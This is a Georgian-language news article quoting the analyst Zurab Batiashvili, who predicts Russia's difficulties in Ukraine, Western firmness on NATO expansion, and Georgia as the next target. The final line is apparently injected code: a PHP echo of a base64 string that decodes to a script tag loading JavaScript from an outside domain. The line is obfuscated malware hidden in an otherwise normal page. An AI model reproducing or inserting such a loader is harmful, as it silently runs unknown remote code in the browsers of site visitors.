celsiusi
ავერსი შნაიდერი
უკრაინა ადვილი „გასეირნება“ არ იქნება რუსეთისთვის, ერთია, უკრაინაში შესვლა და მეორე, იქ რა ელოდება მას და დიდი ალბათობით, მას იქ ელოდება „სლავური ავღანეთი“ - ასე ადვილად ვერ დაიმორჩილებს და ვერ გააკონტროლებს, - ამის შესახებ ექსპერტმა ზურაბ ბატიაშვილმა „ინტერპრესნიუსთან“ განაცხადა.
 
ბატიაშვილის შეფასებით, დასავლეთი არის როგორც არასდროს გამოფხიზლებული და ერთიანი და არ თმობს იმ ძალიან მნიშვნელოვან პრინციპს, რომელიც ჩვენთვის სასიცოცხლოდ მნიშვნელოვანია - ნატო-ს აღმოსავლეთით გაფართოების საკითხი.
 
„ეს არის ის უმნიშვნელოვანესი საკითხი, რომელიც საქართველოს ხვალინდელ დღეს ეხება. ეს კრიზისი არ მოიცავს მხოლოდ უკრაინას, ეს არის ზოგადად რუსეთის იმპერიული პოლიტიკის მცდელობა, შანტაჟის ენით ელაპარაკაოს დანარჩენ ცივილიზებულ სამყაროს, მაგრამ ჩვენთვის და ზოგადად მსოფლიოსთვის კარგი არის ის, რომ დასავლეთი ამ ძალზე მნიშვნელოვან პრინციპულ საკითხში დათმობას არ აპირებს და ეს იყო აღნიშნული აშშ-ის წერილშიც.
 
რუსეთი შევიდა გარკვეულ ჩიხში საკუთარი პოლიტიკითა და რიტორიკით და იქიდან გამოსვლა ძალზე გაჭირდება, იმიტომ, რომ დასავლეთი არ აპირებს დათმობას და რუსეთმა რაღაც უნდა მოიმოქმედოს და ეს რაღაც შეიძლება იყოს სამხედრო მოქმედებების დაწყება. ის განცხადება და ინფორმაცია, რაც ბაიდენმა ზელენსკის მიაწოდა, რა თქმა უნდა, ძალზე სერიოზულად უნდა იყოს აღქმული. რუსეთმა, ფაქტობრივად, დაასრულა თავისი სამხედროების თავმოყრა უკრაინის გარშემო და ახლა ელოდება კონკრეტულ მომენტს, რომელიც შეიძლება საბოლოო მომენტი იყოს ამ კონფლიქტში. აქ უნდა გავითვალისწინოთ ის მომენტი, რომ საბოლოო გადაწყვეტილებას რუსეთში იღებს ერთი ადამიანი, ჩვენ ვიცით, რომ რუსეთს სჩვევია ხისტი და არალოგიკური გადაწყვეტილებების მიღება, ამიტომ მისი მხრიდან არაფრის გამორიცხვა არ შეიძლება, მითუმეტეს ამ ფონზე, როდესაც მან ვერ მიიღო ის, რასაც ელოდა დასავლეთისგან. ბოლო მომენტში რა გადაწყვეტილება დადგება პუტინის თავში, ძნელი სათქმელია, გადაჭრით ვერავინ ვერაფერს იტყვის, თუმცა სიტუაცია ისეთი დაძაბულია, როგორც არასდროს არ ყოფილა და ომის ალბათობა არის,“- განაცხადა ზურაბ ბატიაშვილმა.
 
ამასთანავე, ექსპერტმა გამორიცხა, რომ რუსეთმა პარალელურად ორი - უკრაინისა და საქართველოს მიმართულებით აწარმოოს ომი, თუმცა აღნიშნა, რომ თუ კრემლი უკრაინაში დასახულ მიზანს მიაღწევს, შემდეგი საქართველო იქნება.
 
„რუსეთის მცდელობა, აღადგინოს საბჭოთა კავშირი, მარტო უკრაინას არ მოიცავს. არ აქვს მნიშვნელობა სახელად საბჭოთა კავშირი დაერქმევა თუ სხვა რამ, მნიშვნელოვანია, რომ ეს ახალი იმპერია ვერ შედგება თუ მასში არ იქნება უკრაინა და კავკასია, კავკასიაში კი საკვანძო ქვეყანა არის საქართველო თავისი მდებარეობიდან გამომდინარე, ამიტომ თუ უკრაინაში გამოუვიდა, რა თქმა უნდა, შემდეგი სამიზნე საქართველო იქნება. მე ნაკლებად მიმაჩნია, რომ პარალელურად აწარმოოს ორ მიმართულებაზე შეტევა- უკრაინისა და საქართველოს მიმართლებით, მაგრამ უკრაინაში თუ გამოუვიდა ის რაც ჩაფიქრეული აქვს, შემდეგი სამიზნე საქართველო იქნება. იმედი უნდა გვქონდეს, რომ უკრაინაში არ გამოუვა“, - განაცხადა ბატიაშვილმა.
 
წყარო: IPN
896
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");